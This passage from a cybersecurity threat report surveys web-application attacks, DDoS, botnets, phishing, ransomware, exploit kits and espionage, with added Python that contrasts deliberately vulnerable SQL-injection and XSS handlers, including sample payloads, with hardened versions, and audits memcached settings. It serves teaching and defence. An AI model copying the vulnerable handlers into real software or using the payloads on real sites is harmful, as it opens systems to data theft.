RCE is a vulnerability that allows an attacker to execute code on a target device, for example via a MitM (Man in the Middle) attack on an update channel, where the attack also involves code injection inside the update framework. An RCE vulnerability in an application allows attacker-supplied code to run with the privileges of its host app.

6.3 Web application attacks

Nomenclature Examples Usage Metrics

Nomenclature:
A web application is defined as a client-server-based software system. It is configured on the server and usable by the client through a web browser. Web applications are a vital part of online presence. Examples of web applications are webmail systems, websites, online databases, and online banking systems.

Examples:
Web applications are targeted for various purposes such as stealing sensitive corporate data.

Usage:
SQL Injection and Cross-Site Scripting were the most common attacks, representing approximately 68% of the total number of attacks. SQL Injection is used to access sensitive information or run OS commands for further penetration of a system, while Cross-Site Scripting is directed against application users. Attacks against users were ranked first among the web application threats most common in 2016.

Metrics:
Example: Healthcare: Top 5 Web Application Attacks in 2017 35:
• SQL Injection – 46.0%
• Denial of Service – 22.8%
• Cross-Site Scripting – 16.0%
• Path Traversal – 5.7%
• Local File Inclusion – 4.5%
• Other Web Application Attacks – 5% (e.g. OS Commanding – also known as Command Injection, Information Leakage, XML Injection).
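The two attack classes the table ranks first, SQL Injection and Cross-Site Scripting, are both failures to separate data from code. The following Python is an added example, not code from the SAINT report: a lookup against a constructed in-memory SQLite table in its string-concatenated form beside the parameterized form, and a greeting rendered unescaped beside the escaped form. The table, the usernames and the payload strings are all constructed for the example.

```python
"""SQL injection and cross-site scripting: vulnerable handlers beside hardened ones.

Added example (not from the SAINT report); the patient table and the sample
inputs are constructed for the example.
"""
import html
import sqlite3
from typing import Dict, List


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a healthcare portal's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE patients (id INTEGER PRIMARY KEY, username TEXT, diagnosis TEXT)")
    conn.executemany(
        "INSERT INTO patients (username, diagnosis) VALUES (?, ?)",
        [("alice", "asthma"), ("bob", "diabetes"), ("carol", "hypertension")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> List[str]:
    """String concatenation: the input becomes part of the SQL grammar, so a value
    such as  x' OR '1'='1  rewrites the WHERE clause and returns every row."""
    query = "SELECT username FROM patients WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(query)]


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> List[str]:
    """Bound parameter: the driver passes the value separately from the statement,
    so the same payload is compared literally against the username column."""
    query = "SELECT username FROM patients WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,))]


def render_greeting_vulnerable(display_name: str) -> str:
    """Reflects user-controlled text into HTML unescaped (reflected XSS)."""
    return "<p>Hello " + display_name + "</p>"


def render_greeting_hardened(display_name: str) -> str:
    """Escapes <, >, &, and quotes so the text can only ever render as text."""
    return "<p>Hello " + html.escape(display_name, quote=True) + "</p>"


SQLI_PAYLOAD = "x' OR '1'='1"              # constructed sample input
XSS_PAYLOAD = "<script>alert(1)</script>"  # constructed sample input


def demo() -> Dict[str, object]:
    """Run both pairs against the constructed data and return the results."""
    db = build_sample_db()
    return {
        "sqli_vulnerable": lookup_vulnerable(db, SQLI_PAYLOAD),
        "sqli_parameterized": lookup_parameterized(db, SQLI_PAYLOAD),
        "xss_vulnerable": render_greeting_vulnerable(XSS_PAYLOAD),
        "xss_hardened": render_greeting_hardened(XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:20} {value!r}")
```

The same separation applies to the "run OS commands" case the table mentions: pass arguments as a list to a process API rather than building a shell string, for the same reason the parameterized query is safe.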

35 Healthcare: Top 5 Web Application Attacks in 2017 https://www.calyptix.com/hipaa/healthcare-top-5-web-application-attacks-in-2017/

6.4 Denial of Service (DoS, DDoS, DrDoS)

Nomenclature Examples Usage Metrics

Nomenclature:
A denial-of-service attack (DoS attack) uses traffic from a single source; a Distributed Denial of Service (DDoS) attack uses multiple sources; a distributed reflection denial of service (DrDoS) attack reflects traffic off intermediate servers. All denial-of-service attacks are an attempt to make an online service unavailable or disrupt an online service by overwhelming it with traffic from multiple sources. They primarily target a wide variety of important resources, from banks to news websites, and present a major challenge to making sure people can publish and access important information.

Examples:
DDoS usage is to mask phishing attacks, mask ongoing data breaches, malvertising attacks, intimidation, and corporate ransom.

Usage:
HTTP and HTTPS attacks -- including SYN floods, ACK floods, and application-layer attacks -- remain the dominant type of DDoS attacks. From 2014 reflection denial of service (DrDoS) attacks began to gain ground. From late 2018 Memcached amplification method attacks have emerged.

Metrics:
As shown in fig # (below), the size of a typical DDoS attack has grown significantly - examples:
● In 2008 the DDoS attack disabling Georgia government and financial services (preceding the RU invasion) was 30 MByte / second.
Of recent DDoS attacks:
● Spamhaus (2013) = 300Gbps
● CloudFlare Client (2014) = 400Gbps NTP Amplification
● Hong Kong (2014) = 500Gbps
In March 2018:
● Akamai confirmed a 1.3Tbps DrDoS attack against GitHub
● A 1.7Tbps (1,300 Gbps) DrDoS targeted at a customer of a U.S. based Service Provider. This recent DrDoS attack contained a ransom demand for 50 XMR (Monero), valued at about €15,000, to stop the attack.


Figure 6.1: Peak sizes of DDoS 2007 - 03/2018 - Arbor Networks 36

There are basically five types of DDoS attacks37:

TCP Connection Attacks
Also known as occupying connections, these attempt to use up all the available connections to infrastructure devices such as load-balancers, firewalls and application servers. Even devices capable of maintaining state on millions of connections can be taken down by these attacks.

Volumetric Attacks - Using up bandwidth
These attempt to consume the bandwidth either within the target network/service, or between the target network/service and the rest of the Internet. These attacks are simply about causing congestion.

36 1.7 Tbps DDoS Attack; The Terabit Attack Era Is Upon Us - March 5 2018 - https://www.arbornetworks.com/blog/asert/netscout-arbor-confirms-1-7-tbps-ddos-attack-terabit-attack-era-upon-us/
37 Digital Attack Map - 2018 - https://www.digitalattackmap.com/understanding-ddos/

Fragmentation Attacks - Pieces of packets
These send a flood of TCP or UDP fragments to a victim, overwhelming the victim's ability to re-assemble the streams and severely reducing performance.

Application Attacks - Targeting applications
These attempt to overwhelm a specific aspect of an application or service and can be effective even with very few attacking machines generating a low traffic rate (making them difficult to detect and mitigate).

Memcached
In early 2018, a new and very threatening DrDoS technique emerged. Memcached is an open-source distributed memory object caching system which is generic in nature but often used for speeding up dynamic web applications. In the default configuration, Memcached listens on port 11211/tcp and (up to and including version 1.5.5) also on port 11211/udp. Memcached servers openly accessible from anywhere on the Internet via UDP are abused for DDoS reflection attacks against third parties on a regular basis, i.e. DrDoS.

On February 28 2018, the version control hosting service GitHub was hit with a massive denial of service attack, with 1.35 TB per second of traffic hitting the popular site. Although GitHub was only knocked offline intermittently and managed to beat the attack back entirely after less than 20 minutes, the sheer scale of the assault was worrying, as it outpaced the Dyn attack, which had peaked at 1.2 TB a second. Just days after the GitHub attack, another Memcached-based DrDoS attack hit a U.S. service provider with 1.7 TB per second of data.

The German Government via CERT-Bund released (04 2018) a Crisis-Management report on Open Memcached Servers due to reports of extensive abuse of Memcached servers and the extent of DrDoS emanating from German based server complexes. A solution for ISPs and hosts is listed below 38.
● Do not expose your Memcached server to the Internet!
● Restrict access to the Memcached server to trusted systems (e.g., the web application server) in the server's configuration and/or by blocking incoming connections from the Internet to ports 11211/tcp and 11211/udp on the firewall.
● The UDP port is usually not required. Start Memcached with option '-U 0' to disable it.
● Keep your Memcached installation up-to-date. Install available security updates asap.

The earlier Mirai botnet (2016) was significant in that, unlike most DDoS attacks, it leveraged vulnerable IoT devices rather than PCs and servers. It should be noted that by 2020, there will be 34 billion internet connected devices, and the majority (24 billion) will be IoT devices39. It is unlikely that Mirai will be the last IoT-powered botnet. An investigation across security teams within Akamai, Cloudflare, Flashpoint, Google, RiskIQ and Team Cymru uncovered a similarly sized botnet, dubbed WireX, based on 100,000 compromised Android devices within 100 countries. A series of large DDoS attacks that targeted content providers and content delivery networks prompted the investigation.40
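The CERT-Bund guidance above reduces to two settings on the server itself: the UDP listener must be off (`-U 0`) and the bind address (`-l`) must not be reachable from the Internet. The following Python is an added example, not code from the SAINT report or from CERT-Bund: it reads a Debian-style memcached.conf (one command-line option per line, `#` comments), and reports which of the two points are violated. The trusted-network list and both sample configurations are assumptions constructed for the example; a missing `-U` is treated as UDP enabled, matching the pre-1.5.6 default the text describes.

```python
"""Audit a memcached configuration against the CERT-Bund guidance quoted above.

Added example (not from the SAINT report or CERT-Bund). It understands the
Debian-style /etc/memcached.conf layout (one option per line, '#' comments) and
the -U (UDP port) and -l (bind address) options. TRUSTED_NETS and the two sample
configurations are assumptions constructed for the example.
"""
import ipaddress
import shlex
from typing import Dict, List

# Assumed networks from which an application server may legitimately reach the
# cache; adjust to the deployment. Anything outside these is treated as exposed.
TRUSTED_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "::1/128", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7",
)]


def parse_memcached_conf(text: str) -> List[str]:
    """Flatten a memcached.conf into an argv-like token list."""
    argv: List[str] = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments and blank lines
        if line:
            argv.extend(shlex.split(line))
    return argv


def _options(argv: List[str]) -> Dict[str, str]:
    """Collect the options of interest; the last occurrence wins."""
    opts: Dict[str, str] = {}
    i = 0
    while i < len(argv):
        if argv[i] in ("-U", "-l") and i + 1 < len(argv):
            opts[argv[i]] = argv[i + 1]
            i += 2
        else:
            i += 1
    return opts


def audit_memcached(argv: List[str]) -> List[str]:
    """Return findings; an empty list means the config follows the guidance."""
    opts = _options(argv)
    findings: List[str] = []

    # Guidance: the UDP port is usually not required; start with '-U 0'.
    # Up to and including 1.5.5 the default is UDP on 11211, so no -U counts as enabled.
    udp_port = int(opts.get("-U", "11211"))
    if udp_port != 0:
        findings.append(f"UDP listener enabled on {udp_port}/udp; start memcached with '-U 0'")

    # Guidance: do not expose the server to the Internet; restrict it to trusted systems.
    bind = opts.get("-l")
    if bind is None:
        findings.append("no -l option; memcached listens on all interfaces, bind it to a trusted address")
    else:
        for entry in bind.split(","):
            entry = entry.strip()
            addr = entry.rsplit(":", 1)[0] if entry.count(":") == 1 else entry   # strip IPv4 addr:port
            try:
                ip = ipaddress.ip_address(addr)
            except ValueError:
                findings.append(f"bind address {entry!r} is not an IP literal; verify it manually")
                continue
            if ip.is_unspecified or not any(ip in net for net in TRUSTED_NETS):
                findings.append(f"bound to {addr}, which is outside the trusted networks")
    return findings


# Constructed sample configurations (not taken from any real host).
WEAK_CONF = """
# as commonly shipped: no -l and no -U, so TCP and UDP are open on every interface
-m 64
-p 11211
-u memcache
"""

HARDENED_CONF = """
-m 64
-p 11211
-u memcache
-l 127.0.0.1      # only the local web application server may talk to it
-U 0              # UDP disabled: removes the DrDoS reflection vector
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_memcached(parse_memcached_conf(conf)) or ["no findings"])
```

The firewall rule in the guidance is still worth having even when the audit passes, since a later edit to the file can silently reintroduce the listener.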

38 Openly accessible Memcached servers - April 2018 - https://www.bsi.bund.de/EN/Topics/IT-Crisis-Management/CERT-Bund/CERT-Reports/HOWTOs/Open-Memcached-Server/open-Memcached-server_node.html
39 There will be 24 billion IoT devices installed on Earth by 2020 - http://www.businessinsider.com/there-will-be-34-billion-iot-devices-installed-on-earth-by-2020-2016-5?international=true&r=US&IR=T
40 DDoS explained: How distributed denial of service attacks are evolving - 12 Mar 2018 - https://www.csoonline.com/article/3222095/network-security/ddos-explained-how-denial-of-service-attacks-are-evolving.html

6.5 Botnets

Nomenclature Examples Usage Metrics

Nomenclature:
A botnet refers to a group of computers, mobile devices, or devices connected to the Internet (IoT) which have been infected by malware and have come under the control of a malicious actor or foreign nation state. Protocols such as HTTP(S), SSL and ICMP have come to the fore as compared to earlier IRC alternatives.

Examples:
Some common types of botnet include:
● Denial of service, DDoS, and DrDoS attacks
● Malware distribution
● Email spambots and forum spambots
● Click-fraud bots that artificially increase traffic and increase PPC revenue.
● Cheating game bots to acquire in-game items and currency.
● Warez - search hard drives for software and licenses installed on a victim's PC to transfer for duplication and distribution.
● Keylogging - a threat to the individual's privacy.
● Bitcoin mining botnets

Usage:
Usage for anonymous spam distribution, DDoS attacks, information theft, blackmail, ransomware, bitcoin mining and extortion. Botnets have also evolved to become highly efficient malicious software distribution networks used by cybercriminals. Fellow cybercriminals pay for access to compromised systems controlled by a botnet's C&C (command and control) to deliver even more malware to already-infected computers.

Metrics:
The largest known botnets: in capacity, Srizbi (2008) with 60 billion/day; in size of infected bots, both in 2009, Mariposa with <12 million devices infected, followed by Conficker, a worm delivery / spreading botnet with an unknown purpose; <11 million devices were infected, including machines at the UK's Ministry of Defence and Germany's unified armed forces, Bundeswehr.
In 2009 - reportedly it cost one UK council £1.4 million to recover from a Conficker infection, while Quest (Fr) complained French fighter planes were grounded because of the worm.
2013 - 9 million + unique IP addresses that were victims of botnets in 2013 - with an estimated 3,500 known botnets worldwide41.
2013/2015 - Black Atlas attackers using multiple PoS (Point of Sale) malware programs including Alina, NewPOSThings and BlackPOS. The latter was also used in the 2013 attack against Target that resulted in the compromise of around 40 million payment card details.
In Oct 2016 - the Mirai (ransomware / DNS) botnet had more than doubled from 213,000 to 493,000 infected devices (bots), after source code was posted online.42

41 The state of botnets in late 2015 and early 2016 - https://blog.trendmicro.com/the-state-of-botnets-in-late-2015-and-early-2016/

Key early botnets:
● Bagle and Bobax - the earliest cybercriminal spam botnets - 2004.
● RuStock (spam), Cutwail (malware), Srizbi (spam), Storm - spread via spam and specifically targeted some security vendors/researchers - 2007.
● ASProx & RuStock (spam), Zeus (AKA Zbot, PRG, Wsnpoem, Gorhax, Kneber) - steals banking-related and other financial data; also Waledac, Nucrypt - from 2008.
● Mega-D (aka Ozdok) - responsible for 30% of the world's spam; DOWNAD/Conficker - generated 50,000 alternative C&C server names per day; KOOBFACE - sent out spam on social networking sites and created malicious phishing posts on users' walls - 2009.

A recent major botnet: Mirai - shut down major elements of the internet, including Twitter, Netflix, CNN, and other major sites, as well as major Russian banks and the entire country of Liberia. The botnet took advantage of unsecured internet of things (IoT) devices such as security cameras, installing malware that then attacked the DYN servers that route internet traffic43. - 2016 - 2017

6.6 Phishing

Nomenclature Examples Usage Metrics

Nomenclature:
Phishing is a fraudulent attempt, usually made through email, to steal personal information.
Spear phishing: the fraudulent practice of sending emails ostensibly from a known or trusted sender in order to induce targeted individuals to reveal confidential information, often to gain access to a corporate system.

Examples:
Emails:
● Generic greeting: Phishing emails are usually sent in large batches.
● Forged link: Even if a link has a recognized name, it doesn't mean it links to the real organization.
● Requests personal information: The point of sending a phishing email is to trick the recipient into providing personal information.
● Sense of urgency: Internet criminals want to obtain personal information now. The faster they get information, the faster they can move on to another victim.

Usage:
Phishing uses link manipulation, image filter evasion and website forgery to fool Web users into thinking that a spoofed website is genuine and legitimate. Once the user enters vital information, he immediately becomes a phishing victim.

Metrics:
8 percent of malicious email attachments were docm files (a type of Microsoft Word XML file that executes macros) - e.g. distributing the Dridex banking trojan44.
1 in 131 emails (phishing) contained malware in 2016, the highest rate in 5 years.45

42 MIRAI BOTS MORE THAN DOUBLE SINCE SOURCE CODE RELEASE - Oct 2016 https://threatpost.com/mirai-bots-more-than-double-since-source-code-release/121368/
43 What is a botnet? And why they aren't going away anytime soon - https://www.csoonline.com/article/3240364/hacking/what-is-a-botnet-and-why-they-arent-going-away-anytime-soon.html
44 Malicious spam attachments - 2017 - http://www.grouppbs.com/wp-content/uploads/2017/02/Cisco_2017_ACR_PDF.pdf
45 Phishing statistics - 2018 - https://blog.barkly.com/phishing-statistics-2017

Figure 6.2: Top 10 phishing email subjects for 4th quarter 2018 46

6.7 Ransomware

Nomenclature Examples Usage Metrics

Nomenclature:
Ransomware is a subset of malware in which the data on a victim's computer is locked, typically by encryption, and payment is demanded before the ransomed data is decrypted and access is returned to the victim.

Examples:
The number of ransomware families increased from 30 in 2015 to 98 in 2016, and 100 new malware families were introduced in 2017 47. Ransomware developers have been increasingly demanding the popular cryptocurrency bitcoin in recent years. Private coins such as Monero and Zcash are now the most popular with cybercriminals in 2018 48.
"NotPetya" ransomware cyber-attack, with Nurofen maker Reckitt Benckiser taking an estimated £100m hit in revenue49. Moller-Maersk puts cost of NotPetya attack at up to $300m50.

Usage:
Primarily financial extortion.
Ransomware attacks worldwide51:
● 2014 - 3.2 million
● 2015 - 3.8 million
● 2016 - 638 million
Post NotPetya, after the initial infection, the attackers are now using a combination of Mimikatz, PsExec and WMI, combined with stolen NSA tools, to steal credentials and continue spreading from machine to machine, holding data ransom or destroying the data52.

Metrics:
Cybercriminals took in about $2 Million a month in 2017, based on money coming into ransomware-related Bitcoin wallets53. This includes:
● More than $50 million each for three wallets associated with the Locky ransomware, and a fourth one that processed close to $70 million.
● Cryptowall brought in close to $100 million
● CryptXXX gathered $73 million
● Cerber took in $54 million
● Compared to the detected earnings of $140,000 made by WannaCry and $10,000 by NotPetya

46 https://blog.knowbe4.com/topic/top-clicked-phishing-email-subjects

6.8 Exploit kits

Nomenclature Examples Usage Metrics

Nomenclature:
An exploit kit or exploit pack is a type of toolkit cybercriminals use to attack vulnerabilities in systems so they can distribute malware or perform other malicious activities. Exploit kits are packaged with exploits that can target commonly installed software such as Adobe Flash, Java, Microsoft Silverlight.

Examples:
RIG exploit kit remains one of the most popular exploit kits (2018), used both in malvertising and compromised website campaigns. Its primary payloads are ransomware (Cerber and CryptoShield).
Citadel (emerged 2012) is still regarded as the state-of-the-art toolkit to both distribute malware and manage infected computers (bots). Citadel is an offspring of the popular Zeus crimekit whose main goal is to steal banking credentials by capturing keystrokes and taking screenshot videos of victims' computers.

Usage:
Examples of recent usage of exploit kits:
● Angler
  - Delivered threats to visitors of "The Independent" newspaper after it was hacked.
  - CryptoWall, TeslaCrypt, CryptoLocker ransomware
  - Integrated the Pawn Storm Flash exploit
  - Launched a massive malvertising campaign on high-profile Japanese sites
  - Integrated Hacking Team Flash zero-day flaw
  - Infected PoS systems
  - Delivered macro through the banking malware VAWTRAK
  - Included in a massive malvertising campaign, like the BEDEP malware campaign, on top sites
  - Dropped the DRIDEX malware
  - Delivered the CryptXXX ransomware
  - Hid traffic by using the Diffie-Hellman key exchange protocol
● BlackHole
  - Spread Zeus P2P variant "Gameover" banking trojan
● Magnitude
  - Linked to malicious ads on Yahoo sites
  - Exploited a patched Adobe Flash player flaw
  - Delivered CryptoWall ransomware
  - Delivered Cerber ransomware

Metrics:
A classic case is Paunch (Dmitry Fedotov). "Paunch was the mastermind behind the Blackhole exploit kit, which first appeared in 2010. By the time he was arrested in 2013, he had more than 1,000 customers and was estimated to be earning around $50,000 per month. He was offering and obtaining zero-day vulnerabilities up to $200,000. The "Cool exploit kit", marketed as a "premium" product, cost more, but came with more effective vulnerabilities".
During 2016, Symantec saw a 60 percent decrease in exploit kit detections, but this market has grown again in 2018 with the availability of RIG54.

47 Ransomware - 2017 https://www.symantec.com/security-center/threat-report
48 Cryptocurrencies and ransomware - 2018 - https://www.bloomberg.com/news/articles/2018-01-02/criminal-underworld-is-dropping-bitcoin-for-another-currency
49 Massive cyber-attack could cost Nurofen and Durex maker £100m - 07 2017 - https://www.theguardian.com/business/2017/jul/06/cyber-attack-nurofen-durex-reckitt-benckiser-petya-ransomware
50 Moller-Maersk puts cost of cyber attack at up to $300m https://www.ft.com/content/a44ede7c-825f-11e7-a4ce-15b2513cb3ff
51 Ransomware - 2017 - https://blog.sonicwall.com/tag/ransomware/
52 Common IT Tools are the Hacker's Favorites - 04 2018 - https://www.infosecurity-magazine.com/opinions/it-tools-hackers-favorites/
53 Google Warns Ransomware Boom Scored Crooks $2 Million A Month https://www.forbes.com/sites/thomasbrewster/2017/07/25/google-ransomware-multi-million-dollar-business-with-locky-and-cerber/#cbfbf5d6cafa
54 A short history of the exploit kit - 09 2017 - https://medium.com/threat-intel/exploit-kits-cybersecurity-3ca6283b

6.8.1 Crimeware
Crimeware is any computer program or set of programs designed expressly to facilitate illegal activity online. Many spyware programs, browser hijackers, and keyloggers can be considered crimeware if designed and used for illicit activity. One common type of crimeware is the phishing kit, a collection of tools assembled to make it easier for people with little technical skill to launch a phishing exploit. A phishing kit typically includes Web site development software, complete with graphics, coding, and content that can be used to create convincing imitations of legitimate sites, and spam software to automate the mass mailing campaigns. Phishing kits and other types of crimeware are readily available on the Internet.

6.8.2 Cybercrime as a service
Purchasing cybercrime-as-a-service tools for threats such as malware and DDoS is no longer just something for low level or aspiring hackers. Organised criminal gangs are taking advantage of these services as the underground criminal landscape continues to become more professionalised and mature. Typical examples of this are ransomware kits and botnet rental services.

6.9 APT (Advanced Persistent Threats)

Nomenclature Examples Usage Metrics

Nomenclature:
Advanced Persistent Threats (APTs) are stealthy operations that infiltrate and/or exfiltrate valuable data via unauthorized access to a network and remain undetected for long periods. An APT has a longer and more complex lifecycle than other kinds of attacks.

Examples:
• Stuxnet Worm (2010)
• APT10 (Scanbox, Sogu, Poison Ivy, PlugX)
• APT28 (or Fancy Bear)
• Deep Panda
• Equation
• OilRig
• 2018: Intrusion Set: APT32
• Intrusion Set: APT33
• Intrusion Set: APT34
• APT35 aka Intrusion Set: Charming Kitten

Usage:
APT was traditionally associated with nation-state sponsorship, but more recently it has been used for targeting Managed Service Providers (MSPs) and sensitive client data.

Metrics:
On average, it takes 240 days to detect an APT-related enterprise cybersecurity breach55.
Over the course of four years, it was alleged that more than 31 terabytes of data, about 15 billion pages, was exfiltrated from 140 American universities, 30 U.S. companies and five government agencies and 176 universities abroad. The stolen information, including academic research in technology, medicine and other sciences, is valued at $3.4 billion56

55 https://techbeacon.com/enterprise-it/counter-security-threats-machine-learning-real-time-data-analytics

Figure 6.3: Lifecycle of Advanced Persistent Threats (APT)57

56 https://eu.usatoday.com/story/news/politics/2018/03/23/nine-iranians-charged-massive-cyber-theft-campaign-targeting-universities-justice-says/452327002/
57 https://www.varonis.com/blog/advanced-persistent-threat/

6.10 Data breaches
Currently, by the use of open source methods, there are an estimated 4,846,841,219 (4.8 billion) web-based user accounts that have been compromised by 259 known or reported data breaches58.

Nomenclature Examples Usage Metrics

Nomenclature:
A data breach is an incident wherein information is stolen or taken from a system without the knowledge or authorization of the system's owner. A small company or a large organization may suffer a data breach. Stolen data may involve sensitive, proprietary, or confidential information such as credit card numbers, customer data, trade secrets or matters of national security.

Examples:
The top 5 biggest data breaches recorded - Jan 2018 59:
● Yahoo - 2013-14. Impact: 3 billion user accounts
● Onliner Spambot accounts - 2017. Impact: more than 700 million email accounts
● Adult Friend Finder - October 2016. Impact: more than 412.2 million accounts
● eBay - May 2014. Impact: 145 million users compromised
● Equifax - July 2017. Impact: personal information of 143 million consumers; 209,000 consumers also had their credit card data exposed
● Heartland Payment Systems - March 2008. Impact: 134 million credit cards exposed through SQL injection

Usage:
Primarily a data breach is used to gain client / user / employee data: ID / email addresses, personal records, credit card information. Also, enterprise / governmental: records, intellectual property, intelligence.
Also to note for enterprise victims - the benefits in terms of reduced costs for companies of a data breach:
-$458,000 - having an incident response team
-$385,000 - extensive use of encryption
-$193,000 - participation in threat sharing

Metrics:
At 91.6 percent, "Theft of Data" continues to be the chief cause of data breaches in 2016. There were 1013 data breaches in the U.S. in 2016. By comparison, second place U.K. had just 38 breaches60.
On average hackers are within the victim's system, and egress (data extraction) takes, 9-11 months.
Average cost of a data breach (419 companies / 17 industry sectors / countries - 2017): $3.62 million.
Average number of records in a data breach: 24,089 61.

58 have i been pwned? - https://haveibeenpwned.com/
59 Biggest recorded data breaches - 01 2018 - https://www.csoonline.com/article/2130877/data-breach/the-biggest-data-breaches-of-the-21st-century.html
60 Data Breach - 2016 - https://www.symantec.com/security-center/threat-report
61 Data Breach Study 2017, IBM / Ponemon - 2018 - https://www.ibm.com/security/infographics/data-breach/

6.11 Cyber attacks

Nomenclature Examples Usage Metrics

Nomenclature:
A cyberattack is deliberate exploitation of computer systems, technology-dependent enterprises and networks. Cyberattacks use malicious code to alter computer code, logic or data, resulting in disruptive consequences that can compromise data and lead to cybercrimes, such as information and identity theft. A cyberattack is also known as a computer network attack (CNA).

Examples:
Cyberattacks may include the following consequences:
● Identity theft
● Fraud
● Extortion
● Malware
● Pharming
● Phishing
● Spamming
● Spoofing
● Spyware
● Trojans, viruses, and worms
● Stolen hardware, such as laptops or mobile devices
● DoS, DDoS, and DrDoS attacks
● Breach of access
● Password sniffing
● System infiltration
● Website defacement
● Private and public Web browser exploits
● Instant messaging abuse
● Intellectual property (IP) theft
● Unauthorized access

Usage:
4 typical attack vectors:
● Asymmetric Routing: in this method, the attacker attempts to utilize more than one route to the targeted network device.
● Buffer Overflow Attacks: this approach attempts to overwrite specific sections of computer memory within a network.
● Protocol-Specific Attacks: when performing network activities, devices obey specific rules and procedures. These protocols—such as ARP, IP, TCP, UDP, ICMP, and various application protocols—may inadvertently leave openings for network intrusions via protocol impersonation ("spoofing") or malformed protocol messages.
● Traffic Flooding: an ingenious method of network intrusion simply targets network intrusion detection systems by creating traffic loads too heavy for the system to adequately screen.

Metrics:
The cyberattack on the Equifax credit reporting agency in 2017, which led to the theft of Social Security numbers, birth dates, and other data on almost half the U.S. population62.
Cyber-attacks and cybercrime damage costs to hit $6 trillion annually by 2021. The cybersecurity community and major media have largely concurred on the prediction that cybercrime damages will cost the world $6 trillion annually by 2021, up from $3 trillion in 2015. This represents the greatest transfer of economic wealth in history, risks the incentives for innovation and investment, and will be more profitable than the global trade of all major illegal drugs combined.63

62 Six Cyber Threats to Really Worry About in 2018 - 01 2018 - https://www.technologyreview.com/s/609641/six-cyber-threats-to-really-worry-about-in-2018/
63 Top 5 cybersecurity facts, figures and statistics for 2018 - 01 2018 - https://www.csoonline.com/article/3153707/security/top-5-cybersecurity-facts-figures-and-statistics.html

6.12 Identity theft

Nomenclature Examples Usage Metrics

Nomenclature:
Identity theft, also known as identity fraud, is a crime in which an imposter obtains key pieces of personally identifiable information, such as email address, passwords, social security, medical records, driver's license numbers, passport information, in order to impersonate someone else, physically or via cyber means (emails, social media, etc.).

Examples:
The volume of spam emails increased 4x in 2016.
Fake invoice messages are the #1 type of phishing lure.
Many people respond (1 in 131) to "spam" that promises them some benefit but requests identifying data, without realizing that in many cases the requester has no intention of keeping his promise64.

Usage:
Use in spam campaigns. False applications for loans and credit cards, fraudulent withdrawals from bank accounts, fraudulent use of telephone calling cards or online accounts, or obtaining other goods or privileges which the criminal might be denied if he were to use his real name.

Metrics:
As of April 2018, 4,966,062,037 (4.9 billion!) email addresses / ids are known to be compromised (pwned) in data breaches worldwide. 65

6.13 Cyber espionage

Nomenclature: Cyber espionage describes the stealing of secrets or commercially confidential information stored in digital formats or on computers and IT networks.

Examples: In 2012, European security researchers reported that a cyber espionage virus found on personal computers in several countries in the Middle East was designed to eavesdrop on financial transactions and perhaps disable industrial control systems. The surveillance virus, dubbed Gauss, on PCs in Lebanon and other countries in the region appeared to have been developed by the same team or 'factory' that built the Stuxnet and Flame computer viruses.

Usage: Stuxnet, which was first discovered in 2010, is widely believed to have been used by the US and Israel to attack computer-controlled centrifuges at a uranium enrichment facility in Iran, which disrupted the country's nuclear programme. Similarly, Flame, which was discovered in 2012, has been implicated in an attack on a computer system at Iran's main oil export terminal and its oil ministry. Analysis of the Gauss virus has revealed that it contains multiple modules designed to collect information and send detailed data about the infected machines back to its creators66.

Metrics: In 2009, a large spy network called GhostNet arranged an intrusion into more than 1,000 computers in 103 countries. Perpetrators got unauthorized access to the network of the Dalai Lama offices and used it for compromising other computers. Besides, the attacks were also performed on the foreign ministers and embassies of Germany, Pakistan, India, Iran, South Korea, and Thailand. Operation Shady RAT, the biggest cyber espionage example, affected more than 70 companies and organizations from 2006 and is still active. Victims included the International Olympic Committee, which was compromised during several months prior to the 2008 Olympic Games in Beijing. The United Nations and the World Anti-Doping Agency were also under attack. Investigators identified previously unknown malware that was spread via email with a link to a self-loading remote-access tool, or RAT. The attackers got unauthorized access to legal contracts, government secrets, and other sensitive data67.

64 Must-Know Phishing Statistics 2017 - https://blog.barkly.com/phishing-statistics-2017
65 ID theft and self-check - Have I been Pwned - 04 2018 - https://haveibeenpwned.com/

6.13.1 RATs (Remote Access Trojan)

A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer and is mostly seen as a tool for cyber espionage. RATs are usually downloaded invisibly with a user-requested program, such as a game, or sent as an email attachment (phishing). Once the host system is compromised, the intruder may use it to distribute RATs to other vulnerable computers and establish a botnet.

66 Cyber Espionage - 2016 - http://lexicon.ft.com/Term?term=cyber-espionage
67 10 Biggest Cyber Espionage Cases - 2017 - https://securityaffairs.co/wordpress/66617/hacking/cyber-espionage-cases.html

6.13.2 Cyberterrorism

Cyberterrorism is defined as a premeditated attack against a computer system, computer data, programs and other information with the sole aim of violence by clandestine individuals and subnational groups. By international law, if such an attack is by national groups, or nation states, then this is an act of war, not cyberterrorism (see Cyberwarfare below). The main aim behind cyberterrorism is to cause harm and destruction, for political, religious and ideological purposes.

6.13.3 Cyberwarfare

Cyberwarfare is computer or network-based conflict involving politically motivated attacks by a nation state on another nation state. In these types of attacks, nation state actors attempt to disrupt the activities of organizations or nation-states, especially for strategic or military purposes and cyber espionage. EU member states have a diplomatic document, the "Cyber diplomacy toolbox". The Council agreed in 2015 to draft, and adopted in 2017, a framework for a joint EU diplomatic response to malicious cyber activities. It states that serious cyber-attacks by a foreign nation or national group could be construed as an act of war, not to be confused with cyberterrorism. Such activities may constitute wrongful acts under international law and could give rise to a joint EU response. The EU reiterates that states should not knowingly allow their territory to be used for internationally wrongful acts using Information and Communication Technologies (ICT)68. This brings the EU in line with NATO moves in the past establishing cyber as a legitimate military domain, meaning an online attack could theoretically trigger Article 5, the part of its treaty related to collective defence. That states that an attack on one member is an attack on all 29 NATO allies, and a state-sponsored attack on one EU state is an attack on all 28 EU members. The Tallinn Manual 2.0 is the most comprehensive analysis of how existing international law 